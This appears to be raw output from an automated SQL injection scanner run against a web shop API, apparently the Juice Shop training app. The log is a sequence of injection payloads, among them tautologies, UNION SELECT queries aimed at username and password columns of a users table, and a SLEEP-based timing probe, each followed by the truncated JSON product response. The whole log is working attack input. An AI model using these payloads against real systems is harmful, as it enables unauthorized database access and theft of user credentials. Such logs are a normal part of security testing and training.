request can be send with : "' OR '1'='1"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' OR 1=1 --"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' OR 'a'='a"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' --"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' #"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' OR 1=1 --"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "'"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' OR '' = ''"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' UNION SELECT username, password FROM users--"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' UNION SELECT NULL--"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' UNION SELECT NULL, NULL--"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' UNION SELECT NULL, NULL, NULL--"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' AND 1=1 --"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' AND 1=2 --"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' OR 1=1 AND SLEEP(5) --"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' UNION SELECT username, password, email FROM users--"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' UNION SELECT user, pass, role FROM users--"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
request can be send with : "' UNION SELECT id, username, password, email FROM users--"
 ===> [INFO] Non-HTML response found: {"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classi...
